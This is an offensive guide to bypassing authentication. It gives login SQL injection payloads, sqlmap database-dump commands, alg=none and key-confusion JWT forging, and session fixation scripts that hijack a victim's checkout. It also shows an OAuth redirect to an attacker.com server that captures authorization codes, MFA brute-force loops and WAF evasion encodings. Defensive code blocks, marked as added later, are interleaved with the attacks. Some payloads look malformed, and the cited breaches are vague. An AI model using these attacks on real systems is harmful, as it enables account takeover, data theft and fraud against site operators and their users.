Authentication Bypass Exploitation

This guide provides detailed exploitation techniques for authentication bypass vulnerabilities, including real-world examples, code snippets, and step-by-step methodologies.

1. SQL Injection Authentication Bypass

Technique Overview

SQL injection in authentication forms allows attackers to manipulate SQL queries to bypass login checks.

Real-World Case: Government Portal Breach (2021)

A national government portal used vulnerable authentication code that allowed SQL injection. Attackers gained access to citizen data by bypassing authentication.

Exploitation Steps

Step 1: Identify Vulnerable Login Form

POST /login HTTP/1.1
Host: vulnerable-gov-portal.gov
Content-Type: application/x-www-form-urlencoded

username=test&password=test

Step 2: Test for SQL Injection

username: admin'--
password: anything

-- Equivalent SQL: SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything'

Step 3: Advanced Bypass Payloads

-- Classic bypass
username: admin' OR '1'='1'--
password: anything

-- Union-based injection
username: admin' UNION SELECT 1,'admin','hashed_password',1--
password: anything

-- Boolean-based blind
username: admin' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
password: anything
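The query from Step 2 beside its parameterized fix, as an added example that is not part of the original guide. It uses an in-memory SQLite table constructed for the test, and stores a plaintext password only to keep the example short (real code compares a password hash).

```python
import sqlite3

def seed_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the portal's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery')")
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Input is spliced into the SQL text, so admin'-- closes the string literal and
    # comments out the password check, exactly as the "Equivalent SQL" line shows.
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None

def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterized query: the driver binds the values as data, so quotes, OR and --
    # in the input are compared as characters and never parsed as SQL.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = seed_db()
    for payload in ("admin'--", "admin' OR '1'='1'--"):
        print(payload, "vulnerable:", login_vulnerable(db, payload, "anything"),
              "fixed:", login_fixed(db, payload, "anything"))
```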

Step 4: Automated Exploitation with SQLmap

# Test for injection
sqlmap -u "http://vulnerable-gov-portal.gov/login" --data="username=test&password=test" --level=5 --risk=3

# Dump database
sqlmap -u "http://vulnerable-gov-portal.gov/login" --data="username=test&password=test" --dump-all

# Specific table dump
sqlmap -u "http://vulnerable-gov-portal.gov/login" --data="username=test&password=test" -D app_db -T users --dump

Defense Bypass Techniques

WAF Bypass Payloads

-- URL encoding
username: admin%27%20OR%20%271%27%3D%271%27--

-- Double URL encoding
username: admin%2527%2520OR%2520%25271%2527%253D%25271%2527--

-- Unicode encoding
username: admin%C0%A7OR%C0%A71%C0%A7=C0%A71--

-- Comment variations
username: admin'/**/OR/**/'1'='1'--

2. JWT Token Manipulation Exploitation

Technique Overview

JSON Web Token manipulation allows attackers to modify token claims to escalate privileges or bypass authentication.

Real-World Case: Financial App Compromise (2022)

A fintech application failed to validate JWT signatures, allowing attackers to modify user roles from "user" to "admin".

Exploitation Steps

Step 1: Capture Valid JWT Token

GET /api/user/profile HTTP/1.1
Host: fintech-app.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2MzAwMDAwMDB9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Step 2: Decode and Analyze Token

import jwt

token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2MzAwMDAwMDB9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

# Decode without verification
decoded = jwt.decode(token, options={"verify_signature": False})
print(decoded)
# Output: {'sub': '1234', 'username': 'john', 'role': 'user', 'iat': 1630000000}

Step 3: Modify Token Claims

# Change role to admin
decoded['role'] = 'admin'

# Create new token with 'none' algorithm
new_token = jwt.encode(decoded, key='', algorithm='none')
print(new_token)

Step 4: Use Modified Token

GET /api/admin/dashboard HTTP/1.1
Host: fintech-app.com
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjMwMDAwMDAwfQ.

Advanced JWT Attacks

Key Confusion Attack

# Key confusion: the server is configured for RS256 but also accepts HS256, so its public RSA key doubles as the HMAC secret
public_key = open('public.pem', 'r').read()
token = jwt.encode(decoded, key=public_key, algorithm='HS256')

JKU Header Injection

# Modify token to use attacker-controlled JWK set
decoded_header = {
    "alg": "RS256",
    "typ": "JWT",
    "jku": "https://attacker.com/jwks.json"
}
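The resource-server check that defeats the alg=none token from Step 3 as well as the key-confusion and jku variants above, as an added example that is not part of the original guide. It is a standard-library HS256 verifier with a constructed key; the point is that the expected algorithm and key come from server configuration and the token header is never allowed to choose them.

```python
import base64, hashlib, hmac, json
from typing import Optional

SERVER_KEY = b"constructed-demo-hmac-key"   # constructed; in production this comes from config

def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def _unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())

def issue_token(claims: dict, key: bytes) -> str:
    """Mint an HS256 token the way the issuing service would."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"

def alg_none_token(claims: dict) -> str:
    """The unsigned token from Step 3 (alg=none, empty signature), rebuilt for the test."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."

def verify_token(token: str, key: bytes) -> Optional[dict]:
    """Resource-server check. Algorithm and key are pinned by configuration, so alg=none,
    a public-key-as-HMAC-secret token and a jku/jwk pointing at a foreign key set all fail."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_unb64url(header_b64))
        claims = json.loads(_unb64url(payload_b64))
        sig = _unb64url(sig_b64)
    except ValueError:            # wrong segment count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    if "jku" in header or "jwk" in header or "x5u" in header:
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):   # constant-time compare of the signature
        return None
    return claims if isinstance(claims, dict) else None
```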

3. Session Fixation Exploitation

Technique Overview

Session fixation allows attackers to hijack user sessions by forcing victims to use attacker-controlled session IDs.

Real-World Case: E-commerce Session Hijacking (2020)

A major e-commerce platform was vulnerable to session fixation, leading to unauthorized purchases.

Exploitation Steps

Step 1: Obtain Fixated Session

import requests

# Attacker visits site and gets session
session = requests.Session()
response = session.get('https://vulnerable-store.com')
fixated_session_id = session.cookies.get('sessionid')
print(f"Fixated Session ID: {fixated_session_id}")

Step 2: Lure Victim to Use Session

<!-- Malicious page that sets the session cookie -->
<script>
document.cookie = "sessionid=fixated_session_id; domain=.vulnerable-store.com; path=/";
window.location = "https://vulnerable-store.com/login";
</script>

Step 3: Wait for Victim Authentication

import time
import requests

# Attacker polls the fixated session until the victim has logged in with it
while True:
    response = requests.get('https://vulnerable-store.com/profile',
                            cookies={'sessionid': fixated_session_id})
    if "Welcome" in response.text:
        print("Victim has authenticated!")
        break
    time.sleep(5)

Step 4: Hijack Session

# Access victim's account
response = requests.get('https://vulnerable-store.com/checkout', 
                       cookies={'sessionid': fixated_session_id})
print("Accessing victim's checkout:", response.status_code)
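The server-side change that makes Steps 1 to 4 fail, as an added example that is not part of the original guide: a constructed in-memory session store contrasting the fixation-prone "upgrade the presented ID" pattern with session regeneration on login.

```python
import secrets
from typing import Dict, Optional

class SessionStore:
    """Server-side session table (sid -> signed-in user or None), constructed for this example."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Optional[str]] = {}

    def anonymous(self) -> str:
        """Issue the pre-login session that the attacker obtains in Step 1."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = None
        return sid

    def user_for(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)

    def login_vulnerable(self, presented_sid: str, user: str) -> str:
        """Fixation-prone pattern: the ID the browser presented is upgraded in place, so
        whoever planted that ID now holds an authenticated session."""
        if presented_sid not in self._sessions:
            presented_sid = self.anonymous()
        self._sessions[presented_sid] = user
        return presented_sid

    def login(self, presented_sid: Optional[str], user: str) -> str:
        """Fix: on successful authentication discard the presented ID, whatever its origin,
        and issue a fresh one. A planted cookie keeps pointing at nothing."""
        if presented_sid in self._sessions:
            del self._sessions[presented_sid]
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = user
        return new_sid
```

The returned ID is what the server sends back in Set-Cookie (with Secure, HttpOnly and SameSite); the value already in the browser, planted or not, no longer maps to any session.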

4. OAuth Bypass Exploitation

Technique Overview

OAuth implementation flaws can allow attackers to bypass authentication or obtain unauthorized access tokens.

Real-World Case: Cloud Service Compromise (2021)

A cloud provider had OAuth redirect_uri validation flaws, allowing token theft.

Exploitation Steps

Step 1: Identify OAuth Endpoints

GET /.well-known/oauth-authorization-server
GET /.well-known/openid-configuration

Step 2: Manipulate Redirect URI

GET /oauth/authorize?
  response_type=code&
  client_id=12345&
  redirect_uri=https://attacker.com/callback&
  scope=openid%20profile%20email

Step 3: Code Interception

# Attacker's callback server
from flask import Flask, request
app = Flask(__name__)

@app.route('/callback')
def callback():
    code = request.args.get('code')
    print(f"Captured authorization code: {code}")
    return "Thank you for authenticating!"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

Step 4: Exchange Code for Token

POST /oauth/token HTTP/1.1
Host: oauth-provider.com
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&
code=STOLEN_CODE&
redirect_uri=https://attacker.com/callback&
client_id=12345&
client_secret=CLIENT_SECRET

5. MFA Bypass Techniques

Technique Overview

Multi-Factor Authentication can be bypassed through various techniques including session manipulation and code reuse.

Real-World Case: Banking App MFA Bypass (2022)

A banking application allowed MFA bypass by reusing valid codes or skipping MFA verification.

Exploitation Methods

Session State Manipulation

# Bypass MFA by directly accessing post-MFA endpoints
GET /dashboard HTTP/1.1
Host: bank-app.com
Cookie: session=valid_session_id
X-Forwarded-For: 127.0.0.1

# Manipulate MFA verification state
POST /verify-mfa HTTP/1.1
Host: bank-app.com
Cookie: session=valid_session_id
Content-Type: application/json

{"verified": true, "mfa_code": "123456"}

Time-Based Code Reuse

# Brute force MFA codes (6-digit)
import requests
import itertools

session = requests.Session()
# ... obtain session through login

for code in itertools.product('0123456789', repeat=6):
    mfa_code = ''.join(code)
    response = session.post('/verify-mfa', json={'code': mfa_code})
    if response.status_code == 200:
        print(f"Valid MFA code: {mfa_code}")
        break

MFA Bypass via API Endpoints

# Some apps have separate API endpoints that don't enforce MFA
GET /api/v1/user/profile HTTP/1.1
Host: app.com
Authorization: Bearer valid_token

# Versus the web interface that requires MFA
GET /web/profile HTTP/1.1
Host: app.com
Cookie: session=valid_session_id
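A server-side MFA gate that closes the three methods above, as an added example that is not part of the original guide: the verified flag is never read from the request body, each code is accepted once and attempts are capped, and API and web routes share one check. The session class, the in-memory used-code store and the expected_code parameter (standing in for the server's TOTP computation) are constructed for the example.

```python
import hmac
from collections import defaultdict
from dataclasses import dataclass

MAX_FAILED_ATTEMPTS = 5
_used_codes = defaultdict(set)   # user -> codes already accepted; constructed in-memory store

@dataclass
class Session:
    user: str
    password_ok: bool = False
    mfa_verified: bool = False   # written only by verify_mfa(), never copied from a request
    failed_attempts: int = 0

def verify_mfa(session: Session, request_json: dict, expected_code: str) -> str:
    """Handler for POST /verify-mfa. Only 'mfa_code' is read from the body; a client-supplied
    'verified' flag is ignored. expected_code stands in for the server-side TOTP value."""
    if not session.password_ok:
        return "unauthenticated"
    if session.failed_attempts >= MAX_FAILED_ATTEMPTS:
        return "locked"                          # ends the six-digit enumeration early
    submitted = str(request_json.get("mfa_code", ""))
    if submitted in _used_codes[session.user]:
        return "reused"                          # a captured code cannot be replayed
    if not hmac.compare_digest(submitted.encode(), expected_code.encode()):
        session.failed_attempts += 1
        return "invalid"
    _used_codes[session.user].add(submitted)
    session.failed_attempts = 0
    session.mfa_verified = True
    return "ok"

def authorize(session: Session, path: str) -> int:
    """One gate for every post-login route, /dashboard and /api/v1/user/profile alike.
    No request header (X-Forwarded-For included) takes part in the decision."""
    if path == "/login":
        return 200
    if not session.password_ok:
        return 401
    if path == "/verify-mfa":
        return 200
    if not session.mfa_verified:
        return 403
    return 200
```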

6. Automated Exploitation Tools

SQLmap for Authentication Bypass

# Basic authentication bypass test
sqlmap -u "http://target.com/login" --data="username=admin&password=test" \
  --level=5 --risk=3 --technique=B --batch

# Specific parameter targeting
sqlmap -u "http://target.com/login" --data="username=admin&password=test" \
  -p username --prefix="'" --suffix="--"

# Time-based blind injection
sqlmap -u "http://target.com/login" --data="username=admin&password=test" \
  --technique=T --time-sec=10

JWT Tool Suite

# JWT cracking
jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0In0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

# JWT scan for vulnerabilities
jwt-scan https://target.com/api/user --cookie "token=eyJhbGciOi..."

# JWT forge for token manipulation
python3 jwt_forge.py -t eyJhbGciOi... -k public.pem -a HS256

Custom Exploitation Scripts

#!/usr/bin/env python3
import requests
import sys

def test_sql_injection(url, payloads):
    for payload in payloads:
        data = {'username': payload, 'password': 'test'}
        response = requests.post(url, data=data)
        if "Welcome" in response.text or "Dashboard" in response.text:
            print(f"SUCCESS with payload: {payload}")
            return True
    return False

# Common SQL injection payloads
payloads = [
    "admin'--",
    "admin'/*",
    "admin'#",
    "admin' OR '1'='1'--",
    "admin' UNION SELECT 1,2,3--"
]

if __name__ == "__main__":
    url = sys.argv[1]
    test_sql_injection(url, payloads)

7. Defense Evasion Techniques

WAF Bypass Methods

-- Case variation
Admin' OR '1'='1'--

-- White space alternatives
admin'/**/OR/**/'1'='1'--

-- URL encoding
admin%27%20OR%20%271%27%3D%271%27--

-- Double URL encoding
admin%2527%2520OR%2520%25271%2527%253D%25271%2527--

-- Unicode encoding
admin%C0%A7OR%C0%A71%C0%A7=C0%A71--

Session Fixation Prevention Bypass

// Clear existing sessions before setting new one
document.cookie = "sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; domain=.target.com; path=/";
document.cookie = "sessionid=attacker_session; domain=.target.com; path=/";

OAuth Security Bypass

# Open redirect through parameter pollution
GET /oauth/authorize?redirect_uri=https://target.com/callback&redirect_uri=https://attacker.com

# Host header injection
GET /oauth/authorize?client_id=123&redirect_uri=https://target.com/callback
Host: attacker.com
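Authorization-server checks that close the redirect_uri attack in Section 4 (Steps 2 to 4) and the parameter-pollution and Host-header variants just above, as an added example that is not part of the original guide. The client registry and code store are constructed in-memory stand-ins; the client_id 12345 and callback URL are the page's own.

```python
import secrets
from typing import Dict, Optional
from urllib.parse import parse_qs

# Constructed registry: each client's redirect URIs are recorded in full at registration.
REGISTERED_REDIRECT_URIS: Dict[str, set] = {
    "12345": {"https://target.com/callback"},
}
ISSUED_CODES: Dict[str, dict] = {}   # code -> binding; constructed in-memory store

def validate_redirect_uri(query_string: str) -> Optional[str]:
    """Authorization endpoint. Exact string comparison against the registered set, so
    https://attacker.com/callback never matches; two redirect_uri values (pollution) are
    refused instead of resolved by picking one; nothing is derived from the Host header,
    so host injection does not influence where the code is sent."""
    params = parse_qs(query_string, keep_blank_values=True)
    client_ids = params.get("client_id", [])
    uris = params.get("redirect_uri", [])
    if len(client_ids) != 1 or len(uris) != 1:
        return None
    if uris[0] not in REGISTERED_REDIRECT_URIS.get(client_ids[0], set()):
        return None
    return uris[0]

def issue_code(client_id: str, redirect_uri: str) -> str:
    """Bind the authorization code to the client and the exact redirect_uri it was sent to."""
    code = secrets.token_urlsafe(24)
    ISSUED_CODES[code] = {"client_id": client_id, "redirect_uri": redirect_uri}
    return code

def redeem_code(code: str, client_id: str, redirect_uri: str) -> Optional[dict]:
    """Token endpoint (Step 4): the code is single-use and must arrive with the same client_id
    and redirect_uri it was issued for (RFC 6749, section 4.1.3)."""
    record = ISSUED_CODES.pop(code, None)   # pop: any second presentation of the code fails
    if record is None or record["client_id"] != client_id or record["redirect_uri"] != redirect_uri:
        return None
    return {"access_token": secrets.token_urlsafe(32), "token_type": "Bearer"}
```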

8. Real-World Exploitation Framework

Comprehensive Testing Methodology

  1. Reconnaissance: Identify authentication endpoints and technologies
  2. Testing: Apply various bypass techniques systematically
  3. Validation: Verify successful bypass and access level
  4. Documentation: Record findings and evidence
  5. Reporting: Provide detailed exploitation proof

Example Exploitation Chain

def full_exploitation_chain(target_url):
    # Step 1: Test SQL injection
    if test_sql_injection(target_url + '/login'):
        print("SQL injection vulnerability found!")

    # Step 2: Test session fixation
    session_id = test_session_fixation(target_url)
    if session_id:
        print(f"Session fixation possible: {session_id}")

    # Step 3: Test JWT vulnerabilities
    jwt_token = extract_jwt_token(target_url)
    if test_jwt_manipulation(jwt_token):
        print("JWT manipulation successful!")

    # Step 4: Test OAuth flaws
    if test_oauth_bypass(target_url):
        print("OAuth bypass possible!")

This comprehensive exploitation guide provides security professionals with the tools and techniques needed to identify and exploit authentication bypass vulnerabilities effectively while understanding the corresponding defensive measures.